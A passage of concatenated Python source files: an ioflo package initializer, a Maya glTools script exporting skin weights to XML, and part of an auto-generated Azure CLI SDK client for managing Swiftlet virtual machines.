ioflo/base/__init__.py | BradyHammond/ioflo | 128 | 12776308 | <filename>ioflo/base/__init__.py
""" base package
"""
#print("Package at {0}".format(__path__[0]))
import importlib
_modules = ['globaling', 'excepting', 'interfacing',
'registering', 'storing', 'skedding',
'tasking', 'framing', 'logging', 'serving', 'monitoring',
'acting', 'poking', 'goaling', 'needing', 'traiting',
'fiating', 'wanting','completing','doing', 'deeding', 'arbiting',
'housing', 'building']
for m in _modules:
importlib.import_module(".{0}".format(m), package='ioflo.base')
from .storing import Store, Node, Share, Data, Deck
from .doing import doify, Doer, DoerParam, DoerSince, DoerLapse
|
tools/writeBurlyWeights.py | fsanges/glTools | 165 | 12776339 | import maya.mel as mm
import maya.cmds as mc
import maya.OpenMaya as OpenMaya
import glTools.utils.base
import glTools.utils.mesh
import glTools.utils.skinCluster
import os.path
def writeBurlyWeights(mesh,skinCluster,influence,filePath):
'''
'''
# Get basic procedure information
burly = 'dnBurlyDeformer1'
vtxCount = mc.polyEvaluate(mesh,v=True)
inf = mc.ls(influence,l=True)
# Check skinCluster
if not glTools.utils.skinCluster.isSkinCluster(skinCluster):
raise Exception('Object "'+skinCluster+'" is not a valid skinCluster!')
# Get skinCluster Fn
skinFn = glTools.utils.skinCluster.getSkinClusterFn(skinCluster)
# Get influence dag path
influencePath = glTools.utils.base.getMDagPath(influence)
# Get points affected by influence
infSelectionList = OpenMaya.MSelectionList()
infWeightList = OpenMaya.MFloatArray()
skinFn.getPointsAffectedByInfluence(influencePath,infSelectionList,infWeightList)
infObjectPath = OpenMaya.MDagPath()
infComponentList = OpenMaya.MObject()
infSelectionList.getDagPath(0,infObjectPath,infComponentList)
# Get affect point indices
infComponentIndex = OpenMaya.MIntArray()
infComponentIndexFn = OpenMaya.MFnSingleIndexedComponent(infComponentList)
infComponentIndexFn.getElements(infComponentIndex)
infComponentIndex = list(infComponentIndex)
# Get affect point position and normal arrays
infComponentPosArray = OpenMaya.MPointArray()
infComponentNormArray = OpenMaya.MVectorArray()
infComponentVtxIt = OpenMaya.MItMeshVertex(infObjectPath,infComponentList)
normal = OpenMaya.MVector()
while not infComponentVtxIt.isDone():
infComponentPosArray.append(infComponentVtxIt.position(OpenMaya.MSpace.kWorld))
infComponentVtxIt.getNormal(normal)
infComponentNormArray.append(normal)
infComponentVtxIt.next()
# Open file
fileId = open(filePath, "w")
# Header
header = [ '<?xml version="1.0" standalone="no" ?>\n',
'<dnWeights type="dnBurlyDeformer" version="1.0" name="'+burly+'">\n',
'\t<Map name="'+inf[0]+'">\n',
'\t\t<Topology vertexCount="'+str(vtxCount)+'"/>\n' ]
fileId.writelines(header)
# Weights
weights = ['\t\t<Weights>\n']
for i in range(len(infComponentIndex)):
if not i%5: weights.append('\t\t\t')
weights.append(str(infWeightList[i]) + ' ')
if i%5 == 4: weights.append('\n')
weights.append('\n\t\t</Weights>\n')
fileId.writelines(weights)
# Indices
indices = ['\t\t<Indices>\n']
for i in range(len(infComponentIndex)):
if not i%10: indices.append('\t\t\t')
indices.append(str(infComponentIndex[i]) + ' ')
if i%10 == 9: indices.append('\n')
indices.append('\n\t\t</Indices>\n')
fileId.writelines(indices)
# Position
pos = ['\t\t<Positions>\n']
for i in range(len(infComponentIndex)):
if not i%2: pos.append('\t\t\t')
pos.append(str(infComponentPosArray[i][0])+' '+str(infComponentPosArray[i][1])+' '+str(infComponentPosArray[i][2])+' ')
if i%2: pos.append('\n')
pos.append('\n\t\t</Positions>\n')
fileId.writelines(pos)
# Normals
norm = ['\t\t<Normals>\n']
for i in range(len(infComponentIndex)):
if not i%2: norm.append('\t\t\t')
norm.append(str(infComponentNormArray[i][0])+' '+str(infComponentNormArray[i][1])+' '+str(infComponentNormArray[i][2])+' ')
if i%2: norm.append('\n')
norm.append('\n\t\t</Normals>\n')
fileId.writelines(norm)
# Radii
radii = ['\t\t<Radii>\n']
for i in range(len(infComponentIndex)):
if not i%6: radii.append('\t\t\t')
radii.append('0.01 ')
if i%6 == 5: radii.append('\n')
radii.append('\n\t\t</Radii>\n')
fileId.writelines(radii)
# Footer
footer = ['\t</Map>','\n</dnWeights>']
fileId.writelines(footer)
# Close file
fileId.close()
def writeBurlyWeights_allInfluences(mesh,skinCluster,directoryPath):
'''
'''
# Check mesh
if not glTools.utils.mesh.isMesh(mesh):
raise Exception('Object "'+mesh+'" contains no valid polygon mesh!')
# Check skinCluster
if not glTools.utils.skinCluster.isSkinCluster(skinCluster):
raise Exception('Object "'+skinCluster+'" is not a valid skinCluster!')
# Check directory
if not os.path.isdir(directoryPath):
raise Exception('Directory path "'+directoryPath+'" does not exist!')
# Get skinCluster influences
influenceList = mc.skinCluster(skinCluster,q=True,inf=True)
# Write weights
for influence in influenceList:
writeBurlyWeights(mesh,skinCluster,influence,directoryPath+influence+'.xml')
def loadBurlyWeights(burlyDeformer,directoryPath):
'''
'''
# Check burly deformer
if not mc.objExists(burlyDeformer):
raise Exception('Burly deformer "'+burlyDeformer+'" does not exist!')
# Check directory path
if not directoryPath.endswith('/'): directoryPath+='/'
if not os.path.isdir(directoryPath):
raise Exception('Directory path "'+directoryPath+'" does not exist!')
# Get directory listing
fileList = [i for i in os.listdir(directoryPath) if i.endswith('.xml')]
# Load weights
for filePath in fileList:
fileId = directoryPath+filePath
influence = filePath.replace('.xml','')
mm.eval('dnBurlyDeformer -loadWeights "'+fileId+'" "'+burlyDeformer+'" "'+influence+'"')
def convertToBurly(skinCluster,burlyDeformerName=''):
'''
'''
# Check skinCluster
if not mc.objExists(skinCluster):
raise Exception('SkinCluster "'+skinCluster+'" does not exist!')
if not glTools.utils.skinCluster.isSkinCluster(skinCluster):
raise Exception('Object "'+skinCluster+'" is not a valid skinCluster deformer!')
# Get affected mesh
#mesh =
# Designate temporary path for exported weight files
dirPath = '/usr/tmp/'
# Export skinCluster weight files
influenceList = mc.skinCluster(skinCluster,q=True,inf=True)
writeBurlyWeights_allInfluences(mesh,skinCluster,dirPath)
# Create burly deformer
mm.eval('dnBurlyDeformer_createNamed("'+geo+'","'+burlyDeformerName+'")')
|
src/swiftlet/azext_swiftlet/vendored_sdks/swiftlet/operations/_virtual_machine_operations.py | Mannan2812/azure-cli-extensions | 207 | 12776373 | <gh_stars>100-1000
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualMachineOperations(object):
"""VirtualMachineOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~swiftlet_management_client.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _start_initial(
self,
vm_name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
# Construct URL
url = self._start_initial.metadata['url'] # type: ignore
path_format_arguments = {
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_start_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}/start'} # type: ignore
def begin_start(
self,
vm_name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Start a specified virtual machine.
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._start_initial(
vm_name=vm_name,
resource_group_name=resource_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}/start'} # type: ignore
def _stop_initial(
self,
vm_name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
# Construct URL
url = self._stop_initial.metadata['url'] # type: ignore
path_format_arguments = {
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_stop_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}/stop'} # type: ignore
def begin_stop(
self,
vm_name, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Stop a specified virtual machine.
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._stop_initial(
vm_name=vm_name,
resource_group_name=resource_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}/stop'} # type: ignore
def list_image(
self,
location, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.SwiftletImageListResult"]
"""List all Swiftlet images available for the specified subscription and Azure location.
:param location: The name of a supported Azure region.
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SwiftletImageListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~swiftlet_management_client.models.SwiftletImageListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.SwiftletImageListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_image.metadata['url'] # type: ignore
path_format_arguments = {
'location': self._serialize.url("location", location, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SwiftletImageListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_image.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Swiftlet/locations/{location}/swiftletImages'} # type: ignore
def list_bundle(
self,
location, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.SwiftletBundleListResult"]
"""List all Swiftlet bundles available for the specified subscription and Azure location.
:param location: The name of a supported Azure region.
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SwiftletBundleListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~swiftlet_management_client.models.SwiftletBundleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.SwiftletBundleListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_bundle.metadata['url'] # type: ignore
path_format_arguments = {
'location': self._serialize.url("location", location, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('SwiftletBundleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_bundle.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Swiftlet/locations/{location}/swiftletBundles'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
vm_name, # type: str
location, # type: str
swiftlet_bundle_sku, # type: str
swiftlet_image_id, # type: str
tags=None, # type: Optional[Dict[str, str]]
username=None, # type: Optional[str]
ssh_public_key=None, # type: Optional[str]
password=<PASSWORD>, # type: Optional[str]
ports=None, # type: Optional[List["models.Port"]]
startup_script=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.VirtualMachine"
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
_parameters = models.VirtualMachine(tags=tags, location=location, swiftlet_bundle_sku=swiftlet_bundle_sku, swiftlet_image_id=swiftlet_image_id, username=username, ssh_public_key=ssh_public_key, password=password, ports=ports, startup_script=startup_script)
api_version = "2020-03-01-preview"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'VirtualMachine')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
vm_name, # type: str
location, # type: str
swiftlet_bundle_sku, # type: str
swiftlet_image_id, # type: str
tags=None, # type: Optional[Dict[str, str]]
username=None, # type: Optional[str]
ssh_public_key=None, # type: Optional[str]
password=<PASSWORD>, # type: Optional[str]
ports=None, # type: Optional[List["models.Port"]]
startup_script=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.VirtualMachine"]
"""Create or update a virtual machine.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param location: The geo-location where the resource lives.
:type location: str
:param swiftlet_bundle_sku: Specifies the Swiftlet bundle of this virtual machine (which
specifies the selected tier of memory, processing, and storage).
:type swiftlet_bundle_sku: str
:param swiftlet_image_id: The image ID to use. The image "platform" must match the
"supportedImagePlatform" of the specified swiftletBundleSku.
:type swiftlet_image_id: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param username: The username for connecting the the virtual machine.
:type username: str
:param ssh_public_key: The SSH public key used to connect to this virtual machine. Only
supported on Linux images. If specified on a Windows image, an error will be returned.
:type ssh_public_key: str
:param password: The password for connecting to this Swiftlet. If the image platform type is
"linux", this is optional if sshPublicKey is set. If the image platform type is "windows", this
is required.
:type password: str
:param ports: The ports on which inbound traffic will be allowed.
:type ports: list[~swiftlet_management_client.models.Port]
:param startup_script: An inline script that will run upon startup of the virtual machine.
:type startup_script: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualMachine or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~swiftlet_management_client.models.VirtualMachine]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
vm_name=vm_name,
location=location,
swiftlet_bundle_sku=swiftlet_bundle_sku,
swiftlet_image_id=swiftlet_image_id,
tags=tags,
username=username,
ssh_public_key=ssh_public_key,
password=password,
ports=ports,
startup_script=startup_script,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def _update_initial(
self,
resource_group_name, # type: str
vm_name, # type: str
tags=None, # type: Optional[Dict[str, str]]
ports=None, # type: Optional[List["models.Port"]]
**kwargs # type: Any
):
# type: (...) -> "models.VirtualMachine"
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
_parameters = models.VirtualMachineUpdate(tags=tags, ports=ports)
api_version = "2020-03-01-preview"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'VirtualMachineUpdate')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def begin_update(
self,
resource_group_name, # type: str
vm_name, # type: str
tags=None, # type: Optional[Dict[str, str]]
ports=None, # type: Optional[List["models.Port"]]
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.VirtualMachine"]
"""Update a virtual machine.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param ports: Specifies the list of ports to be opened.
:type ports: list[~swiftlet_management_client.models.Port]
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualMachine or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~swiftlet_management_client.models.VirtualMachine]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_initial(
resource_group_name=resource_group_name,
vm_name=vm_name,
tags=tags,
ports=ports,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
vm_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
vm_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Delete a virtual machine.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
